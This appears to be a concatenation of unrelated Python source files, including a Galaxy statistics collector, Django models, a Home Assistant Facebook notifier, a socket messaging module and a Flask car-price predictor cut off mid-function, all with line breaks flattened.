set_parameter(self, name, value): if len(np.shape(value)) == 0: value = value * np.ones(self.get_n_genes()) self.parameters[name] = value def _exist_data(self, *data_names): if len(data_names) == 1: ret = self.data[data_names[0]] is not None else: ret = np.array([self.data[k] is not None for k in data_names], dtype=bool) return ret def _exist_parameter(self, *param_names): if len(param_names) == 1: ret = self.parameters[param_names[0]] is not None else: ret = np.array([self.parameters[k] is not None for k in param_names], dtype=bool) return ret def get_exist_data_names(self): ret = [] for k, v in self.data.items(): if v is not None: ret.append(k) return ret
nilq/baby-python
python
#!/usr/bin/env #Imports import subprocess from collections import defaultdict import re import os import string import sys import argparse import datetime def transform_groups(blob): lines = blob.stdout.decode('utf-8').split('\n') stat = defaultdict(lambda: defaultdict()) months = [] for line in lines: line = line.strip() if re.match(r'\d+', line): tmp = re.split("\s+\|\s+", line) if tmp[1] == 'History Retention Keeplist': continue stat[tmp[1]][tmp[0]] = tmp[2] months.append(tmp[0]) months = set(months) output = 'User_group' for month in sorted(months): output += '\t' + str(month) output += '\n' for key in sorted(stat.keys()): output += key for month in sorted(months): if month in stat[key].keys(): output += '\t' + str(stat[key][month]) else: output += '\t0' output += '\n' return output def transform_monthly(blob): lines = blob.stdout.decode('utf-8').split('\n') stat = defaultdict() for line in lines: line = line.strip() if re.match(r'\d+', line): tmp = re.split('\s+\|\s+', line) stat[tmp[0]] = tmp[1] output1 = '' output2 = '' for month in sorted(stat.keys()): output1 += '\t' + month output2 += '\t' + stat[month] output = output1 + '\n' + output2 + '\n' return output def transform_destination(blob): lines = blob.stdout.decode('utf-8').split('\n') stat = defaultdict(lambda: defaultdict()) months = [] for line in lines: line = line.strip() if re.match(r'\d+', line): tmp = re.split("\|", line) tmp = list(map(str.strip, tmp)) if tmp[1] == '': dest = 'Meta' else: dest = (tmp[1].split("_"))[0] if tmp[0] in stat[dest].keys(): stat[dest][tmp[0]] += int(tmp[2]) else: stat[dest][tmp[0]] = int(tmp[2]) months.append(tmp[0]) months = set(months) output = 'Destination' for month in sorted(months): output += '\t' + str(month) output += '\n' for key in sorted(stat.keys()): output += key for month in sorted(months): if month in stat[key].keys(): output += '\t' + str(stat[key][month]) else: output += '\t0' output += '\n' return output def collect(queries, args): #get the year year = datetime.datetime.now().year for q in queries: #make command cmd = q['command'].split() if not args.initialize: cmd.append(str(year)) db_stat = subprocess.run(cmd, stdout=subprocess.PIPE) if q['type'] == 'group': stat = transform_groups(db_stat) elif q['type'] == 'monthly': stat = transform_monthly(db_stat) elif q['type'] == 'destination': stat = transform_destination(db_stat) print(q['header']) print(stat) print() #Main def main(): VERSION = 0.1 AUTHOR = 'Simon Gladman' LICENSE = 'GPLv3' DATE_CREATED = 'Aug 2020' parser = argparse.ArgumentParser(description="Collects monthly statistics for Galaxy Australia") parser.add_argument("-i", "--initialize", help="Runs the script as though its the first time. Collects all stats from entire history.", action='store_true') #parser.add_argument("-c", "--config_file", help="The config file to use - contains all of the querys to run.") parser.add_argument("-t", "--type", help="Only run the queries of this type") parser.add_argument("-p", "--print_queries", help="Print out the queries to be collected and exit", action='store_true') parser.add_argument('--version', action='store_true') parser.add_argument('--verbose', action='store_true') args = parser.parse_args() if args.version: print("monthly_stats_collector.py version: %.1f" % VERSION) return query_list = [ { 'header': 'Monthly Users Registered Per Group', 'command': 'gxadmin local query-monthly-users-registered-by-group', 'type': 'group' }, { 'header': 'Monthly Active Users Per Group', 'command': 'gxadmin local query-monthly-users-active-by-group', 'type': 'group' }, { 'header': 'Monthly Jobs Per Group', 'command': 'gxadmin local query-monthly-jobs-by-group', 'type': 'group' }, { 'header': 'Monthly New Data Per Group', 'command': 'gxadmin local query-monthly-new-data-by-group', 'type': 'group' }, { 'header': 'Monthly Jobs', 'command': 'gxadmin query monthly-jobs', 'type': 'monthly' }, { 'header': 'Monthly New Users', 'command': 'gxadmin query monthly-users-registered', 'type': 'monthly' }, { 'header': 'Monthly Users Active', 'command': 'gxadmin query monthly-users-active', 'type': 'monthly' }, { 'header': 'Monthly New Data', 'command': 'gxadmin query monthly-data', 'type': 'monthly' }, { 'header': 'Monthly Jobs Per Destination', 'command': 'gxadmin local query-monthly-jobs-per-destination', 'type': 'destination' } ] if args.print_queries: print('Query Type\tQuery Name\tQuery Command') for q in query_list: print(q['type'] + '\t' + q['header'] + '\t' + q['command']) exit() if args.type: queries = [] for q in query_list: if q['type'] == args.type: queries.append(q) collect(queries, args) else: collect(query_list, args) if __name__ == "__main__": main()
nilq/baby-python
python
from django.db import models from django.contrib.auth.models import User from django.forms import ModelForm, Textarea, TextInput, Select from django.utils import timezone # Create your models here. class Unvetted(models.Model): token_address = models.CharField(max_length=120) telegram_url = models.CharField(max_length=120) image = models.ImageField(upload_to='media') #proof_of_payment = models.CharField(max_length=200, blank=True, default=None) pub_date = models.DateTimeField(default=timezone.now) status = models.BooleanField(default=False) def __str__(self): return self.token_address class Banner(models.Model): title = models.CharField(max_length=200) text = models.CharField(max_length=500) link = models.CharField(max_length=100) image = models.ImageField(upload_to='media') company_name = models.CharField(max_length=100) interest = models.CharField(max_length=200) budget = models.CharField(max_length=100) proof_of_payment = models.CharField(max_length=100) about_project = models.TextField() pub_date = models.DateTimeField(default=timezone.now) status = models.BooleanField(default=False) def __str__(self): return self.title class IotexChart(models.Model): price = models.CharField(max_length=200) pub_date = models.DateTimeField(default=timezone.now) status = models.BooleanField(default=False) def __str__(self): return self.price
nilq/baby-python
python
from .base_options import BaseOptions class TrainOptions(BaseOptions): def initialize(self): BaseOptions.initialize(self) self._parser.add_argument('--total_epoch', type=int, default=20, help='total epoch for training') self._parser.add_argument('--learning_rate', type=float, default=0.0001, help='initial learning rate') self._parser.add_argument('--decay_rate', type=float, default=0.99, help='decay rate') self._parser.add_argument('--batch_size', type=int, default=2, help='input batch size') self.is_train = True
nilq/baby-python
python
import json import os.path import codecs from sampledata.exceptions import ParameterError LOCALES = ['us'] OCCUPATIONS_PATH = os.path.join(os.path.dirname(__file__), 'occupations') class Occupation(object): data = {} def __load_locale(self, locale): locale_path = os.path.join(OCCUPATIONS_PATH, "{0}.json".format(locale)) if not os.path.exists(locale_path): raise ParameterError('Not valid locale') fd = codecs.open(locale_path, 'r', encoding='utf-8') Occupation.data[locale] = json.load(fd) fd.close() def get_occupations(self, locale): if locale not in Occupation.data: self.__load_locale(locale) return [x for x in Occupation.data[locale]['occupations']] def all_occupations(self): occupations = [] for locale in LOCALES: occupations += self.get_occupations(locale) return occupations def generate(self, sd, locale=None): if locale: occupations = self.get_occupations(locale) else: occupations = self.all_occupations() return sd.choice(occupations)
nilq/baby-python
python
"""Facebook platform for notify component.""" import json import logging from aiohttp.hdrs import CONTENT_TYPE import requests import voluptuous as vol from homeassistant.components.notify import ( ATTR_DATA, ATTR_TARGET, PLATFORM_SCHEMA, BaseNotificationService, ) from homeassistant.const import CONTENT_TYPE_JSON import homeassistant.helpers.config_validation as cv _LOGGER = logging.getLogger(__name__) CONF_PAGE_ACCESS_TOKEN = "page_access_token" BASE_URL = "https://graph.facebook.com/v2.6/me/messages" CREATE_BROADCAST_URL = "https://graph.facebook.com/v2.11/me/message_creatives" SEND_BROADCAST_URL = "https://graph.facebook.com/v2.11/me/broadcast_messages" PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( {vol.Required(CONF_PAGE_ACCESS_TOKEN): cv.string} ) def get_service(hass, config, discovery_info=None): """Get the Facebook notification service.""" return FacebookNotificationService(config[CONF_PAGE_ACCESS_TOKEN]) class FacebookNotificationService(BaseNotificationService): """Implementation of a notification service for the Facebook service.""" def __init__(self, access_token): """Initialize the service.""" self.page_access_token = access_token def send_message(self, message="", **kwargs): """Send some message.""" payload = {"access_token": self.page_access_token} targets = kwargs.get(ATTR_TARGET) data = kwargs.get(ATTR_DATA) body_message = {"text": message} if data is not None: body_message.update(data) # Only one of text or attachment can be specified if "attachment" in body_message: body_message.pop("text") if not targets: _LOGGER.error("At least 1 target is required") return # broadcast message if targets[0].lower() == "broadcast": broadcast_create_body = {"messages": [body_message]} _LOGGER.debug("Broadcast body %s : ", broadcast_create_body) resp = requests.post( CREATE_BROADCAST_URL, data=json.dumps(broadcast_create_body), params=payload, headers={CONTENT_TYPE: CONTENT_TYPE_JSON}, timeout=10, ) _LOGGER.debug("FB Messager broadcast id %s : ", resp.json()) # at this point we get broadcast id broadcast_body = { "message_creative_id": resp.json().get("message_creative_id"), "notification_type": "REGULAR", } resp = requests.post( SEND_BROADCAST_URL, data=json.dumps(broadcast_body), params=payload, headers={CONTENT_TYPE: CONTENT_TYPE_JSON}, timeout=10, ) if resp.status_code != 200: log_error(resp) # non-broadcast message else: for target in targets: # If the target starts with a "+", it's a phone number, # otherwise it's a user id. if target.startswith("+"): recipient = {"phone_number": target} else: recipient = {"id": target} body = { "recipient": recipient, "message": body_message, "messaging_type": "MESSAGE_TAG", "tag": "ACCOUNT_UPDATE", } resp = requests.post( BASE_URL, data=json.dumps(body), params=payload, headers={CONTENT_TYPE: CONTENT_TYPE_JSON}, timeout=10, ) if resp.status_code != 200: log_error(resp) def log_error(response): """Log error message.""" obj = response.json() error_message = obj["error"]["message"] error_code = obj["error"]["code"] _LOGGER.error( "Error %s : %s (Code %s)", response.status_code, error_message, error_code )
nilq/baby-python
python
"""jinjalint Usage: jinjalint [options] [INPUT ...] Options: -h --help Show this help message and exit. --version Show version information and exit. -v --verbose Verbose mode. -c --config FILE Specify the configuration file. The configuration file must be a valid Python file. """ from docopt import docopt from .lint import lint, resolve_file_paths from .config import parse_config from ._version import get_versions def print_issues(issues, config): sorted_issues = sorted( issues, key=lambda i: (i.location.file_path, i.location.line), ) for issue in sorted_issues: print(str(issue)) def main(): arguments = docopt(__doc__) input_names = arguments['INPUT'] or ['.'] verbose = arguments['--verbose'] if arguments['--version']: print(get_versions()['version']) return if arguments['--config']: if verbose: print('Using configuration file {}'.format(arguments['--config'])) config = parse_config(arguments['--config']) else: config = {} config['verbose'] = verbose paths = list(resolve_file_paths(input_names, extensions=['.html'])) if verbose: print('Files being analyzed:') print('\n'.join(str(p) for p in paths)) print() issues = lint(paths, config) print_issues(issues, config) if any(issues): exit(1) if __name__ == '__main__': main()
nilq/baby-python
python
import logging import re from datetime import datetime class SFHelper(object): @staticmethod def get_pi_name(path, log = True): pi_names = {"staudt": "Louis_Staudt", "Staudt": "Louis_Staudt", "Soppet": "Daniel_Soppet", "Schrump": "David_Schrump", "Shrump": "David_Schrump", "Electron": "Electron_Kabebew", "Hager": "Gordon_Hager", "Hunter": "Kent_Hunter", "KentHuter": "Kent_Hunter", "Jonathan_Keller_Sun": "Jonathan_Keller", "Nagao": "Keisuke_Nagao", "Bustin": "Michael_Bustin", "Restifo": "Nicholas_Restifo", "Philipp_Oberdoerffer_Kim": "Philipp_Oberdoerffer", "Xin_Wei_Wang": "Xin_Wang", "Pommier": "Yves_Pommier", "Vinson": "Chuck_Vinson", "Batchelor": "Eric_Batchelor", "Brownell": "Issac_Brownell", "Ji_Luo": "Ji_Luo", "ShivGrewal": "Shiv_Grewal", "Raffeld": "Mark_Raffeld", "Javed": "Javed_Khan", "_tumor": "Tomas_Villmas", "_pancreas": "Tomas_Villmas", "JingHuang": "Jing_Huang", "Aladjem": "Mirit_Aladjem", "Alajem": "Mirit_Aladjem", "Muegge": "Kathrin_Muegge", "Li_Yang": "Li_Yang", "Thiele": "Carol_Thiele", "Bosselut": "Remy_Bosselut", "Frederick_Barr": "Frederick_Barr", "Trinchieri": "Giorgio_Trinchieri", "Ripley": "Taylor_Ripley", "Alfred_Singer": "Alfred_Singer", "Sample_SPECS_2070": "Louis_Staudt", "Pastan": "Ira_Pastan", "Merlino": "Glenn_Merlino", "Udayan": "Udayan_Guha", "LiYang": "Li_Yang", "Bhandoola":"Avinash_Bhandoola", "Levens": "David_Levens", "SteveHughes": "Stephen_Hughes", "StephenHuges": "Stephen_Hughes", "Shalini": "Shalini_Oberdoerffer", "Strathern": "Jeff_Strathern", "HonpingZheng": "Honping_Zheng", "Wakefield": "Lalage_Wakefield", "LiWang": "Li_Wang", "Guerrerio": "Pamela_Guerrerio", "KathyKelly": "Kathy_Kelly", "ShuoGu": "Shuo_Gu", "MarkGilbert": "Mark_Gilbert", "Yamini": "Yamini_Dalal", "AartiGautam": "Aarti_Gautam", "Hernandez": "Jonathan_Hernandez", "DinahSinger": "Dinah_Singer", "Reid": "Thomas_Reid", "JingHuang": "Jing_Huang", "YingZhang": "Ying_Zhang", "Nickerson": "Mike_Nickerson", "Lipkowitz": "Stan_Lipkowitz", "Brownell": "Issac_Brownell", "Jung-Min": "Jung-Min_Lee", "PhilippOberdoerffer": "Philipp_Oberdoerffer", "Ambs": "Stefan_Ambs", "Shern": "Jack_Shern", "Tofilon": "Philip_Tofilon", "Doroshow": "James_Doroshow", "Alewine": "Christine_Alewine", "JonathanKeller": "Jonathan_Keller", "HowardYoung": "Howard_Young", "Klinman": "Dennis_Klinman", "Dean": "Micheal_Dean", "Pinto": "Ligia_Pinto", "Fountaine": "Thomas_Fountaine", "Rudloff": "Udo_Rudloff", "Sowalsky": "Adam_Sowalsky", "Hongliang": "Hongliang_Zhang", "Franchini": "Genoveffa_Franchini", "Myong-Hee": "Myong-Hee_Sung", "YinlingHu": "Yinling_Hu", "Agdashian": "David_Agdashian", "AlfredSinger": "Alfred_Singer", "Szabova": "Ludmila_Szabova", "XiWang":"Xi_Wang", "Gottesman": "Michael_Gottesman", "Yuspa": "Stuart_Yuspa", "Roberts": "David_Roberts", "Mistelli": "Tom_Misteli", "Misteli": "Tom_Misteli", "Tomozumi": "Tomozumi_Imamichi", "Raffit": "Raffit_Hassan", "Bartolome": "Ramiro_Iglesias-Bartolome", "RobertWest": "Robert_West", "Citrin": "Deborah_Citrin", "XinWang": "Xin_Wang", "Chunzhang": "Chunzhang_Yang"} pi_name = 'CCRSF' if log is True: logging.info("Getting pi_name from path: " + path) if 'Undetermined' in path or path.endswith('supplement.tar') or 'singlecell' in path: pi_name = 'SF_Archive_Flowcell_Info' elif 'NEBnext_UltraII' not in path and 'Neoprep' not in path \ and 'testing' not in path and 'SEER' not in path: for element in (pi_names): if element in path: #Perform mapping using pi_names if match is found pi_name = pi_names[element] break if 'CCRSF' in pi_name: # derive pi name path_elements = (path.split("/")[0]).split("_") # Assumes that PI name is in the beginning, and last and first names are separated by an '_' if len(path_elements) > 4 and path_elements[3].isalpha() and path_elements[4].isdigit(): # If the 4th is alpha, and 5th is a number, then pick the first 2 pi_name = path_elements[0] + "_" + path_elements[1] elif len(path_elements) > 2 and path_elements[1].isalpha() and path_elements[2].isdigit(): # If the 2nd is alpha, and 3rd is a number, then pick the first 2 pi_name = path_elements[0] + "_" + path_elements[1] #if len(path_elements) > 2 and path_elements[2].isalpha() and path_elements[2] not in ['RAS', 'cegx', 'swift']: # else if the first 3 are alpha pick 0 and 2 #pi_name = path_elements[0] + "_" + path_elements[2] #else: #if len(path_elements) > 1 and path_elements[1].isalpha(): # else if the first 2 are alpha, pick 0 and 1 #pi_name = path_elements[0] + "_" + path_elements[1] #else: #pi_name = path_elements[0] #Assumes that PI name is in the beginning, and the format is FirstnameLastname #pi_name = re.sub(r'([A-Z])', r' \1', path_elements[0]) if log is True: logging.info("pi_name from " + path + " is " + pi_name) return pi_name @staticmethod def get_contact_name(path): # derive pi name #path_elements = path.split("_") path_elements = (path.split("/")[0]).split("_") # Assumes the contact name follows the PI name separated from it by a '_', # the contact last and first names are separated by an '_' if len(path_elements) > 4 and path_elements[3].isalpha() and path_elements[4].isdigit() and len(str(path_elements[4] is 5)): contact_name = path_elements[2] + "_" + path_elements[3] else: contact_name = None # the contact name format is FirstnameLastname #if path_elements[1].isalpha(): #contact_name = re.sub(r'([A-Z])', r'_\1', path_elements[1]) #else: #contact_name = "" return contact_name @staticmethod def get_project_id(path, log = True): if log is True: logging.info("Getting project_id from path: " + path) project_id = 'Unspecified' if 'Undetermined' not in path: #path_elements = path.split("_") path_elements = (path.split("/")[0]).split("_") #The project_id is the first string containing only digits. If this string #is not a 5 digit number then use default project_id for element in path_elements: if element.isdigit(): if len(str(element)) >= 5: project_id = element break #If there is a string of the format 'CSXXXXXX' immediately after the #name fields where 'XXXXXX' has only digits, that is the project_id if element.startswith('CS') and element[4:].isdigit(): project_id = element break #Assumes that PI and contact names are in the format 'FirstnameLastname' #project_id = path_elements[2] if log is True: logging.info("project_id from " + path + " is " + project_id) return project_id @staticmethod def get_project_name(path, tarfile, ext = None): if 'Undetermined' in path or tarfile.endswith('supplement.tar') or 'singlecell' in tarfile or len(path.split("/")) == 1: project_name = SFHelper.get_run_name(tarfile) #if 'Undetermined' in path and ext is not None: #project_name = project_name + '_' + ext else: # derive project name if len(path.split("/")) > 2: project_name = path.split("/")[-3] else: project_name = path.split("/")[0] #Hardcoded exclusion if(project_name == 'Sample_SPECS_2070'): project_name = 'Staudt_Roland_49mRNA_11_2_15' if ext is not None and ext != 'Unaligned': project_name = project_name + '_' + ext logging.info("project_name from " + path + " and ext " + ext + " is " + project_name) else: logging.info("project_name from " + path + " is " + project_name) return project_name @staticmethod def get_sample_name(path): logging.info("Getting sample_name from path: " + path) if 'Sample_' not in path: #sample_name = 'Undetermined' #Use part of the file name i.e. upto '_S' for the sample_path file_name = path.rsplit("/", 1)[-1] sample_name = file_name.rsplit("_S", 1)[0] else: # derive sample name - first remove the filename part sample_path = path.rsplit("/", 1)[0] #Then get the sample name part sample_name = sample_path.split("Sample_")[-1] logging.info("sample_name from " + path + " is " + sample_name) return sample_name @staticmethod def get_flowcell_id(tarfile, log = True): if log is True: logging.info("Getting flowcell_id from tarfile: " + tarfile) #Rule: After the last underscore in tar filename #flowcell_str = tarfile.split(".")[0].split("_")[-1] flowcell_str = tarfile.split(".")[0].split("_")[3] flowcell_id = flowcell_str[1:len(flowcell_str)] if log is True: logging.info("Flowcell_id from tarfile: " + tarfile + " is " + flowcell_id) return flowcell_id @staticmethod def get_run_date(tarfile): #Rule: String before the first underscore in tar filename - in the form YYMMDD #Change to MM/DD/YY run_date_str = tarfile.split(".")[0].split("_")[0] run_date = datetime.strptime(run_date_str, "%y%m%d").strftime("%m-%d-%y") return run_date @staticmethod def get_run_name(tarfile): #Rule: String before the '.tar' in the tar filename run_name = tarfile.split(".")[0] # Remove '_supplement' from the project_name if present run_name = run_name.split("_supplement")[0] # Remove '_lane' from the project_name if present run_name = run_name.split("_lane")[0] return run_name @staticmethod def get_sequencing_platform(tarfile): sequencing_platform = 'Unspecified' #Rule: First letter after the first '_' (i.e. 2nd column) in the tar filename sequencing_platform_code = tarfile.rstrip().split('_')[1][0] if(sequencing_platform_code == 'N'): sequencing_platform = 'NextSeq' elif (sequencing_platform_code == 'J' or sequencing_platform_code == 'D'): sequencing_platform = 'HiSeq' else: flowcell_id = SFHelper.get_flowcell_id(tarfile) if re.match("(\d){8}-(\w){5}", flowcell_id): sequencing_platform = 'MiSeq' return sequencing_platform @staticmethod def get_sequencing_application_type(path): sequencing_application_type = 'Unspecified' if('RNA_' in path): sequencing_application_type = 'RNA' elif('Chip_' in path): sequencing_application_type = 'Chip' elif('exomelib' in path): sequencing_application_type = 'exomelib' return sequencing_application_type
nilq/baby-python
python
from os.path import basename from pandas import read_csv from NaiveBayes import * from DecisionTrees import * from KNN import * from K_Means import * from Evaluator import * from PickleFiles import * def run(): try: os.mkdir(os.path.join("", "myFiles")) except FileExistsError: pass ask_to_load = input("Restore a recently created model?\n1) Yes\n2) No\nYour choice: ") if ask_to_load == '1': pickle_file = input("Enter dump file destination: ") file_dump = loadData(pickle_file) analysis(file_dump) if ask_to_load == '2': discretization_mode = {'1': 'equal-width', '2': 'equal-frequency', '3': 'entropy'} train_path = input("Please enter training file location: ") test_path = input("Please enter testing file location: ") user_bins = int(input("\nEnter amount of bins: ")) bin_mode = input("\nEnter discretization mode:\n1) Equal-Width\n2) Equal-Frequency\n3) Entropy\nYour choice: ") user_algorithm = input("\nEnter algorithm mode:\n" "1) Decision Tree\n" "2) SKLearn Decision Tree\n" "3) Naive Bayes\n" "4) SKLearn Naive Bayes\n" "5) KNN\n" "6) K-Means\n" "Your choice: ") bin_mode = discretization_mode[bin_mode] train = read_csv(filepath_or_buffer=train_path, delimiter=',') test = read_csv(filepath_or_buffer=test_path, delimiter=',') if user_algorithm == '1': decision_tree = DecisionTree(train, test, basename(train_path), basename(test_path), 0.001, user_bins,bin_mode) decision_tree.run() storeData(decision_tree) analysis(decision_tree) if user_algorithm == '2': decision_tree_sk = DecisionTreeSKLearn(train, test, 10, 10, basename(train_path), basename(test_path)) decision_tree_sk.run() storeData(decision_tree_sk) analysis(decision_tree_sk) if user_algorithm == '3': naive_bayes = NaiveBayes(train, test, basename(train_path), basename(test_path), user_bins, bin_mode) naive_bayes.run() storeData(naive_bayes) analysis(naive_bayes) if user_algorithm == '4': naive_bayes_sk = NaiveBayes_SKLearn(train, test, basename(train_path), basename(test_path)) naive_bayes_sk.run() storeData(naive_bayes_sk) analysis(naive_bayes_sk) if user_algorithm == '5': knn = KNN(train, test, int(input("How many K clusters??\nYour choice: ")), basename(train_path),basename(test_path)) knn.run() storeData(knn) analysis(knn) if user_algorithm == '6': k_means = KMeans(train, int(input("How many K clusters??\nYour choice: ")), 100, 30) k_means.run() storeData(k_means) analysis(k_means) repeated = True while (repeated): run() if input("\n\nRun Again?\n1) Yes\n2) No\nYour choice: ") == '2': repeated = False
nilq/baby-python
python
import pickle import pandas as pd import nltk import re from nltk.corpus import wordnet as ewn import numpy as np def load_dataset(path,train): train_data = np.load(path, allow_pickle=True) ########if(not train): #train_data = train_data[()] embeddings = train_data['embeddings'] labels = train_data['labels'] sense_keys = train_data['synsets'] synsets = [sc2ss(sensekey) for sensekey in sense_keys] print('loaded BERT embeddings') return embeddings, labels, synsets def sc2ss(sensekey): '''Look up a synset given the information from SemCor''' ### Assuming it is the same WN version (e.g. 3.0) # TO DO: Need a better way of extracting string synset = str(ewn.lemma_from_key(sensekey).synset())[8:-2] #print(synset) return synset count = 0 def get_neg_sampling(data_loc,loc,save_loc): print(data_loc) print(loc) embeddings, labels, synsets = load_dataset(data_loc,True) df = pd.read_csv(loc,sep='\t') def get_key(sent): return sent.split()[0] df['key'] = df['gloss'].apply(get_key) print('keys done') def sc2ss(sensekey): '''Look up a synset given the information from SemCor''' ### Assuming it is the same WN version (e.g. 3.0) # TO DO: Need a better way of extracting string synset = str(ewn.lemma_from_key(sensekey).synset())[8:-2] #print(synset) return synset def get_wordnet_pos(treebank_tag): if treebank_tag.startswith('J'): return 's' elif treebank_tag.startswith('V'): return 'v' elif treebank_tag.startswith('N'): return 'n' elif treebank_tag.startswith('R'): return 'r' else: return None def sensekey_2_syn(x): syn = sc2ss(x).split('.')[1] return syn df['syn'] = df['sense_key'].apply(sensekey_2_syn) print('got syn') def get_tag(x): sent = x['sentence'] #key = x['gloss'].split()[0] key = x['key'] #sense = x['sense_key'] global count count+=1 if(count%2000==0): print('We are at line ',count) #syn = sc2ss(sense).split('.')[1] syn = x['syn'] #sent is a single sentence tokens = nltk.word_tokenize(sent) tokens = [t for t in tokens if not re.search(r'[^\w\d\s]',t)] tags = nltk.pos_tag(tokens) for i in range(len(tokens)): if tokens[i]==key: val = get_wordnet_pos(tags[i][1]) if val==syn: return 1 else: return 0 return 0 print('done') df['pos'] = df.apply(get_tag,axis=1) out = df['pos'].to_numpy() #print(df['pos'].head()) #print(df['pos'].sum()) #np.save('mask_train_pos.npy',out) embeddings = embeddings[out==1] labels = labels[out==1] synsets = np.array(synsets)[out==1] dataset = {} dataset['embeddings'] = embeddings dataset['labels'] = labels dataset['synsets'] = synsets with open(save_loc, 'wb') as handle: pickle.dump(out, handle, protocol=pickle.HIGHEST_PROTOCOL) return dataset import argparse if __name__ =='__main__': parser = argparse.ArgumentParser() parser.add_argument("--embeddings_loc",default=None,type=str,help="Location to embeddings of numpy") parser.add_argument("--csv_loc",default=None,type=str,help="Location to the csv") parser.add_argument("--save_location",default=None,type=str,help="Location for the final dataset") args = parser.parse_args() d = get_neg_sampling(data_loc=args.embeddings_loc,loc=args.csv_loc,save_loc = args.save_location) # d = get_neg_sampling(data_loc='combined.npy',loc= '/home/pratyushgarg11/data/bert-n-graph-embeddings/GlossBert-GraphEmbeddings/Training_Corpora/SemCor/semcor_train_sent_cls_ws.csv') ''' count= 0 def count_zeros(word): global count if not word: count+=1 return 0 _ = words.apply(count_zeros) print(count) print(words.head()) '''
nilq/baby-python
python
import io import json import time import errno import socket import struct import threading from . import logs from . import utils TIMEOUT = 0.1 BACKLOG = socket.SOMAXCONN CHUNK_SIZE = io.DEFAULT_BUFFER_SIZE error = socket.error timeout = socket.timeout log = logs.get(__name__) def start_client(address, handler, stop=None, retry_limit=-1, retry_interval=1): stop = stop or threading.Event() t = utils.start_thread(client_loop, address, handler, stop, retry_limit, retry_interval) return (StoppableThread(t, stop), address) def client_loop(address, handler, stop, retry_limit, retry_interval): count = 0 timeout = TIMEOUT while not stop.is_set(): try: with connect(address, timeout) as sock: sock.sendinit() handler(sock) except socket.error as e: log.error('connection error: %s', e) if stop.is_set(): break count += 1 if retry_limit != -1 and count > retry_limit: log.warning('retry limit reached (attempt #%s)', count) break time.sleep(retry_interval) log.warning('retrying connection (attempt #%s)', count) def start_server(address, handler, stop=None, backlog=None): stop = stop or threading.Event() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(address) sock.listen(backlog or BACKLOG) host, port = sock.getsockname() log.info('listening: %s:%s', host, port) t = utils.start_thread(server_loop, sock, handler, stop) return (StoppableThread(t, stop), (host, port)) def server_loop(server_sock, handler, stop): timeout = TIMEOUT server_sock.settimeout(timeout) while not stop.is_set(): try: s, addr = server_sock.accept() except socket.timeout: continue log.info('connected: %s:%s', *addr) with SockIO(s) as sock: sock.recvinit() sock.settimeout(timeout) handler(sock) def connect(address, timeout=None): log.debug('connecting: %s:%s', *address) sock = socket.create_connection(address, timeout) log.info('connected: %s:%s', *address) return SockIO(sock) class SockIO(object): def __init__(self, sock, chunk_size=None): self._sock = sock self._chunk_size = chunk_size or CHUNK_SIZE def sendinit(self): log.debug('sendinit') self.sendmsg({'cmd': 'init'}) def recvinit(self): msg = self.recvmsg() log.debug('recvinit: %s', msg) try: if msg['cmd'] == 'init': return except Exception: pass raise InvalidInitialization() def sendmsg(self, msg): data = json.dumps(msg).encode('utf8') self.send(data) def recvmsg(self): data = self.recv() return json.loads(data.decode('utf8')) def send(self, data): data_len = len(data) size = struct.pack('>I', data_len) self._sock.sendall(size) self._sock.sendall(data) def recv(self): return b''.join(self.recviter()) def recviter(self): buf = b''.join(self.recvsize(4)) data_len = struct.unpack('>I', buf)[0] for chunk in self.recvsize(data_len): yield chunk def recvsize(self, size): sock = self._sock pos = 0 chunk_size = min(size, self._chunk_size) while pos < size: chunk = sock.recv(min(size-pos, chunk_size)) if not chunk: raise ReceiveInterrupted() pos += len(chunk) yield chunk def settimeout(self, t): self._sock.settimeout(t) def close(self): try: self._sock.shutdown(socket.SHUT_RDWR) except (OSError, socket.error) as e: # ignore if not connected if e.errno not in (errno.ENOTCONN,): raise self._sock.close() def __enter__(self): return self def __exit__(self, etype, evalue, etb): self.close() class StoppableThread(object): def __init__(self, thread, stop): self._thread = thread self._stop = stop def stop(self): self._stop.set() def join(self): self._thread.join() class SockIOError(Exception): pass class InvalidInitialization(SockIOError): pass class ReceiveInterrupted(SockIOError, error): pass
nilq/baby-python
python
from flask import Flask, request, render_template from flask_cors import cross_origin import pickle app = Flask(__name__) model = open('car.pkl','rb') regressor = pickle.load(model) @app.route("/") @cross_origin() def home(): return render_template('car.html') @app.route("/predict", methods=["GET","POST"]) @cross_origin() def predict(): #CAR BRAND AMBASSADOR=0 AUDI=0 BENTLEY=0 BMW=0 CHEVROLET=0 DATSUN=0 FIAT=0 FORCE=0 FORD=0 HONDA=0 HYUNDAI=0 ISUZU=0 JAGUAR=0 JEEP=0 LAMBORGHINI=0 LAND=0 MAHINDRA=0 MARUTI=0 MERCEDES=0 MINI=0 MITSUBISHI=0 NISSAN=0 PORSCHE=0 RENAULT=0 SKODA=0 TATA=0 TOYOTA=0 VOLKSWAGEN=0 VOLVO=0 #LOCATION Ahmedabad=0 Bangalore=0 Chennai=0 Pune=0 Mumbai=0 Coimbatore=0 Hyderabad=0 Jaipur=0 Kochi=0 Kolkata=0 Delhi=0 #FUEL Diesel=0 LPG=0 Petrol=0 CNG=0 #TRANSMISSION Manual=0 if request.method == 'POST': name = request.form['Brand'] if name == 'AUDI': AUDI=1 elif name == 'BENTLEY': BENTLEY=1 elif name == 'BMW': BMW=1 elif name == 'CHEVROLET': CHEVROLET=1 elif name == 'DATSUN': DATSUN=1 elif name == 'FIAT': FIAT=1 elif name == 'FORCE': FORCE=1 elif name == 'FORD': FORD=1 elif name == 'HONDA': HONDA=1 elif name == 'HYUNDAI': HYUNDAI=1 elif name == 'ISUZU': ISUZU=1 elif name == 'JAGUAR': JAGUAR=1 elif name == 'JEEP': JEEP=1 elif name == 'LAMBORGHINI': LAMBORGHINI=1 elif name == 'LAND': LAND=1 elif name == 'MAHINDRA': MAHINDRA=1 elif name == 'MARUTI': MARUTI=1 elif name == 'MERCEDES-BENZ': MERCEDES=1 elif name == 'MINI': MINI=1 elif name == 'MITSUBUSHI': MITSUBISHI=1 elif name == 'NISSAN': NISSAN=1 elif name == 'PORSCHE': PORSCHE=1 elif name == 'RENAULT': RENAULT=1 elif name == 'SKODA': SKODA=1 elif name == 'TATA': TATA=1 elif name == 'TOYOTA': TOYOTA=1 elif name == 'VOLKSWAGEN': VOLKSWAGEN=1 elif name == 'VOLVO': VOLVO=1 else: AMBASSADOR=1 loc 